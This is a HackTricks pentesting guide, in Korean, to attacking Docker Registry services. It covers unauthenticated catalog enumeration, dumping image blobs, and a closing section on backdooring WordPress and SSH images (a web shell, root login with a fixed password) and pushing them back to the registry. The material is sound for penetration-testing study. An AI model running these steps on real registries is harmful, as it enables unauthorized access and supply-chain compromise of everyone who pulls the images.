# 5000 - Pentesting Docker Registry {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ## ๊ธฐ๋ณธ ์ •๋ณด **Docker registry**๋กœ ์•Œ๋ ค์ง„ ์ €์žฅ ๋ฐ ๋ฐฐํฌ ์‹œ์Šคํ…œ์€ ์ด๋ฆ„์ด ์ง€์ •๋œ Docker ์ด๋ฏธ์ง€์— ๋Œ€ํ•ด ์กด์žฌํ•˜๋ฉฐ, ์—ฌ๋Ÿฌ ๋ฒ„์ „์ด ํƒœ๊ทธ๋กœ ๊ตฌ๋ถ„๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ด๋ฏธ์ง€๋Š” ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ๋‚ด์˜ **Docker repositories**์— ์กฐ์ง๋˜์–ด ์žˆ์œผ๋ฉฐ, ๊ฐ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ๋Š” ํŠน์ • ์ด๋ฏธ์ง€์˜ ๋‹ค์–‘ํ•œ ๋ฒ„์ „์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. ์ œ๊ณต๋˜๋Š” ๊ธฐ๋Šฅ์„ ํ†ตํ•ด ์‚ฌ์šฉ์ž๋Š” ํ•„์š”ํ•œ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ ์ด๋ฏธ์ง€๋ฅผ ๋กœ์ปฌ๋กœ ๋‹ค์šด๋กœ๋“œํ•˜๊ฑฐ๋‚˜ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์—…๋กœ๋“œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. **DockerHub**๋Š” Docker์˜ ๊ธฐ๋ณธ ๊ณต๊ฐœ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ๋กœ ์‚ฌ์šฉ๋˜์ง€๋งŒ, ์‚ฌ์šฉ์ž๋Š” ์˜คํ”ˆ ์†Œ์Šค Docker registry/distribution์˜ ์˜จํ”„๋ ˆ๋ฏธ์Šค ๋ฒ„์ „์„ ์šด์˜ํ•˜๊ฑฐ๋‚˜ ์ƒ์—…์ ์œผ๋กœ ์ง€์›๋˜๋Š” **Docker Trusted Registry**๋ฅผ ์„ ํƒํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ, ๋‹ค์–‘ํ•œ ๋‹ค๋ฅธ ๊ณต๊ฐœ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ๋ฅผ ์˜จ๋ผ์ธ์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜จํ”„๋ ˆ๋ฏธ์Šค ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์—์„œ ์ด๋ฏธ์ง€๋ฅผ ๋‹ค์šด๋กœ๋“œํ•˜๋ ค๋ฉด ๋‹ค์Œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค: ```bash docker pull my-registry:9000/foo/bar:2.1 ``` ์ด ๋ช…๋ น์€ `my-registry` ๋„๋ฉ”์ธ์˜ ํฌํŠธ `9000`์— ์žˆ๋Š” ์˜จํ”„๋ ˆ๋ฏธ์Šค ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์—์„œ `foo/bar` ์ด๋ฏธ์ง€ ๋ฒ„์ „ `2.1`์„ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค. ๋ฐ˜๋Œ€๋กœ, `2.1`์ด ์ตœ์‹  ๋ฒ„์ „์ธ ๊ฒฝ์šฐ DockerHub์—์„œ ๋™์ผํ•œ ์ด๋ฏธ์ง€๋ฅผ ๋‹ค์šด๋กœ๋“œํ•˜๋ ค๋ฉด ๋ช…๋ น์ด ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๊ฐ„๋‹จํ•ด์ง‘๋‹ˆ๋‹ค: ```bash docker pull foo/bar ``` **๊ธฐ๋ณธ ํฌํŠธ:** 5000 ``` PORT STATE SERVICE VERSION 5000/tcp open http Docker Registry (API: 2.0) ``` ## Discovering ์ด ์„œ๋น„์Šค๋ฅผ ๋ฐœ๊ฒฌํ•˜๋Š” ๊ฐ€์žฅ ์‰ฌ์šด ๋ฐฉ๋ฒ•์€ nmap์˜ ์ถœ๋ ฅ์—์„œ ํ™•์ธํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์–ด์จŒ๋“ , HTTP ๊ธฐ๋ฐ˜ ์„œ๋น„์Šค์ด๋ฏ€๋กœ HTTP ํ”„๋ก์‹œ ๋’ค์— ์žˆ์„ ์ˆ˜ ์žˆ์œผ๋ฉฐ nmap์ด ์ด๋ฅผ ๊ฐ์ง€ํ•˜์ง€ ๋ชปํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ ์ผ๋ถ€ ์ง€๋ฌธ: * `/`์— ์ ‘๊ทผํ•˜๋ฉด ์‘๋‹ต์— ์•„๋ฌด๊ฒƒ๋„ ๋ฐ˜ํ™˜๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. * `/v2/`์— ์ ‘๊ทผํ•˜๋ฉด `{}`๊ฐ€ ๋ฐ˜ํ™˜๋ฉ๋‹ˆ๋‹ค. * `/v2/_catalog`์— ์ ‘๊ทผํ•˜๋ฉด ๋‹ค์Œ์„ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: * `{"repositories":["alpine","ubuntu"]}` * `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}` ## Enumeration ### HTTP/HTTPS Docker registry๋Š” **HTTP** ๋˜๋Š” **HTTPS**๋ฅผ ์‚ฌ์šฉํ•˜๋„๋ก ๊ตฌ์„ฑ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ๊ฐ€์žฅ ๋จผ์ € ํ•ด์•ผ ํ•  ์ผ์€ **์–ด๋–ค ๊ฒƒ์ด** ๊ตฌ์„ฑ๋˜์–ด ์žˆ๋Š”์ง€ **์ฐพ๋Š” ๊ฒƒ**์ž…๋‹ˆ๋‹ค: ```bash curl -s http://10.10.10.10:5000/v2/_catalog #If HTTPS Warning: Binary output can mess up your terminal. Use "--output -" to tell Warning: curl to output it to your terminal anyway, or consider "--output Warning: " to save to a file. #If HTTP {"repositories":["alpine","ubuntu"]} ``` ### Authentication Docker registry๋Š” **authentication**์„ ์š”๊ตฌํ•˜๋„๋ก ๊ตฌ์„ฑ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash curl -k https://192.25.197.3:5000/v2/_catalog #If Authentication required {"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]} #If no authentication required {"repositories":["alpine","ubuntu"]} ``` Docker Registry๊ฐ€ ์ธ์ฆ์„ ์š”๊ตฌํ•˜๋Š” ๊ฒฝ์šฐ [**์ด ๋ฐฉ๋ฒ•์„ ์‚ฌ์šฉํ•˜์—ฌ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**](../generic-methodologies-and-resources/brute-force.md#docker-registry).\ **์œ ํšจํ•œ ์ž๊ฒฉ ์ฆ๋ช…์„ ์ฐพ์œผ๋ฉด ์ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ** ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ๋ฅผ ์—ด๊ฑฐํ•ด์•ผ ํ•˜๋ฉฐ, `curl`์—์„œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash curl -k -u username:password https://10.10.10.10:5000/v2/_catalog ``` ### Enumeration using DockerRegistryGrabber [DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber)๋Š” ๋„์ปค ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ๋ฅผ ์—ด๊ฑฐ/๋คํ”„ํ•˜๋Š” ํŒŒ์ด์ฌ ๋„๊ตฌ์ž…๋‹ˆ๋‹ค (๊ธฐ๋ณธ ์ธ์ฆ ์—†์ด ๋˜๋Š” ๊ธฐ๋ณธ ์ธ์ฆ๊ณผ ํ•จ๊ป˜). ```bash usage: drg.py [-h] [-p port] [-U USERNAME] [-P PASSWORD] [-A header] [--list | --dump_all | --dump DOCKERNAME] url ____ ____ ____ | _ \ | _ \ / ___| | | | || |_) || | _ | |_| || _ < | |_| | |____/ |_| \_\ \____| Docker Registry grabber tool v2 by @SyzikSecu positional arguments: url URL options: -h, --help show this help message and exit -p port port to use (default : 5000) Authentication: -U USERNAME Username -P PASSWORD Password -A header Authorization bearer token Actions: --list --dump_all --dump DOCKERNAME DockerName Example commands: python drg.py http://127.0.0.1 --list python drg.py http://127.0.0.1 --dump my-ubuntu python drg.py http://127.0.0.1 --dump_all python drg.py https://127.0.0.1 -U 'testuser' -P 'testpassword' --list python drg.py https://127.0.0.1 -U 'testuser' -P 'testpassword' --dump my-ubuntu python drg.py https://127.0.0.1 -U 'testuser' -P 'testpassword' --dump_all python drg.py https://127.0.0.1 -A '' --list python drg.py https://127.0.0.1 -A '' --dump my-ubuntu python drg.py https://127.0.0.1 -A '' --dump_all python3 DockerGraber.py http://127.0.0.1 --list [+] my-ubuntu [+] my-ubuntu2 python3 DockerGraber.py http://127.0.0.1 --dump my-ubuntu [+] blobSum found 5 [+] Dumping my-ubuntu [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 [+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 [+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 [+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 [+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 python3 DockerGraber.py http://127.0.0.1 --dump_all [+] my-ubuntu [+] my-ubuntu2 [+] blobSum found 5 [+] Dumping my-ubuntu [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 [+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 [+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 [+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 [+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 [+] blobSum found 5 [+] Dumping my-ubuntu2 [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4 [+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2 [+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605 [+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6 [+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888 ``` ### Enumeration using curl ํ•œ ๋ฒˆ **๋„์ปค ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทผ์„ ์–ป์€ ํ›„** ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๋ช‡ ๊ฐ€์ง€ ๋ช…๋ น์–ด๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: ```bash #List repositories curl -s http://10.10.10.10:5000/v2/_catalog {"repositories":["alpine","ubuntu"]} #Get tags of a repository curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list {"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]} #Get manifests curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest { "schemaVersion": 1, "name": "ubuntu", "tag": "latest", "architecture": "amd64", "fsLayers": [ { "blobSum": "sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935" }, { "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" }, { "blobSum": "sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10" } ], "history": [ { "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}" }, { "v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}" }, { "v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}" } ], "signatures": [ { "header": { "jwk": { "crv": "P-256", "kid": "DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX", "kty": "EC", "x": "leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg", "y": "Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg" }, "alg": "ES256" }, "signature": "GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q", "protected": "eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ" } ] } #Download one of the previously listed blobs curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar #Inspect the insides of each blob tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory ``` {% hint style="warning" %} ๋‹ค์šด๋กœ๋“œํ•˜๊ณ  ๋ธ”๋กญ ํŒŒ์ผ์„ ์••์ถ• ํ•ด์ œํ•˜๋ฉด ํ˜„์žฌ ๋””๋ ‰ํ† ๋ฆฌ์— ํŒŒ์ผ๊ณผ ํด๋”๊ฐ€ ๋‚˜ํƒ€๋‚ฉ๋‹ˆ๋‹ค. **๋ชจ๋“  ๋ธ”๋กญ์„ ๋‹ค์šด๋กœ๋“œํ•˜๊ณ  ๋™์ผํ•œ ํด๋”์— ์••์ถ• ํ•ด์ œํ•˜๋ฉด ์ด์ „์— ์••์ถ• ํ•ด์ œ๋œ ๋ธ”๋กญ์˜ ๊ฐ’์ด ๋ฎ์–ด์”Œ์›Œ์ง€๋ฏ€๋กœ ์ฃผ์˜ํ•˜์‹ญ์‹œ์˜ค. ๊ฐ ๋ธ”๋กญ์˜ ์ •ํ™•ํ•œ ๋‚ด์šฉ์„ ๊ฒ€์‚ฌํ•˜๊ธฐ ์œ„ํ•ด ๊ฐ ๋ธ”๋กญ์„ ๋‹ค๋ฅธ ํด๋” ์•ˆ์— ์••์ถ• ํ•ด์ œํ•˜๋Š” ๊ฒƒ์ด ํฅ๋ฏธ๋กœ์šธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.** {% endhint %} ### Enumeration using docker ```bash #Once you know which images the server is saving (/v2/_catalog) you can pull them docker pull 10.10.10.10:5000/ubuntu #Check the commands used to create the layers of the image docker history 10.10.10.10:5000/ubuntu #IMAGE CREATED CREATED BY SIZE COMMENT #ed05bef01522 2 years ago ./run.sh 46.8MB # 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B # 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B # 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B # 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59โ€ฆ 16.2MB #Run and get a shell docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running docker ps #Using a different shell docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container ``` ### WordPress ์ด๋ฏธ์ง€์— ๋ฐฑ๋„์–ด ์ถ”๊ฐ€ํ•˜๊ธฐ Docker Registry์—์„œ WordPress ์ด๋ฏธ์ง€๋ฅผ ๋ฐœ๊ฒฌํ•œ ๊ฒฝ์šฐ, ๋ฐฑ๋„์–ด๋ฅผ ์ถ”๊ฐ€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ **๋ฐฑ๋„์–ด**๋ฅผ **์ƒ์„ฑ**ํ•ฉ๋‹ˆ๋‹ค: {% code title="shell.php" %} ```bash ``` {% endcode %} **Dockerfile**๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค: {% code title="Dockerfile" %} ```bash FROM 10.10.10.10:5000/wordpress COPY shell.php /app/ RUN chmod 777 /app/shell.php ``` {% endcode %} **์ƒˆ๋กœ์šด** ์ด๋ฏธ์ง€๋ฅผ **์ƒ์„ฑ**ํ•˜๊ณ , **์ƒ์„ฑ**๋˜์—ˆ๋Š”์ง€ **ํ™•์ธ**ํ•œ ํ›„, **ํ‘ธ์‹œ**ํ•ฉ๋‹ˆ๋‹ค: ```bash docker build -t 10.10.10.10:5000/wordpress . #Create docker images docker push registry:5000/wordpress #Push it ``` ### Backdooring SSH server image Docker Registry์—์„œ SSH ์ด๋ฏธ์ง€๋ฅผ ๋ฐœ๊ฒฌํ•˜๊ณ  ์ด๋ฅผ ๋ฐฑ๋„์–ดํ•˜๊ณ  ์‹ถ๋‹ค๊ณ  ๊ฐ€์ •ํ•ด ๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค.\ **์ด๋ฏธ์ง€๋ฅผ ๋‹ค์šด๋กœ๋“œ**ํ•˜๊ณ  **์‹คํ–‰**ํ•ฉ๋‹ˆ๋‹ค: ```bash docker pull 10.10.10.10:5000/sshd-docker-cli docker run -d 10.10.10.10:5000/sshd-docker-cli ``` `sshd_config` ํŒŒ์ผ์„ SSH ์ด๋ฏธ์ง€์—์„œ ์ถ”์ถœํ•ฉ๋‹ˆ๋‹ค: ```bash docker cp 4c989242c714:/etc/ssh/sshd_config . ``` And modify it to set: `PermitRootLogin yes` Create a **Dockerfile** like the following one: {% tabs %} {% tab title="Dockerfile" %} ```bash FROM 10.10.10.10:5000/sshd-docker-cli COPY sshd_config /etc/ssh/ RUN echo root:password | chpasswd ``` {% endtab %} {% endtabs %} **์ƒˆ๋กœ์šด** ์ด๋ฏธ์ง€๋ฅผ **์ƒ์„ฑ**ํ•˜๊ณ , **์ƒ์„ฑ**๋˜์—ˆ๋Š”์ง€ **ํ™•์ธ**ํ•œ ํ›„, **ํ‘ธ์‹œ**ํ•ฉ๋‹ˆ๋‹ค: ```bash docker build -t 10.10.10.10:5000/sshd-docker-cli . #Create docker images docker push registry:5000/sshd-docker-cli #Push it ``` ## References * [https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/) {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}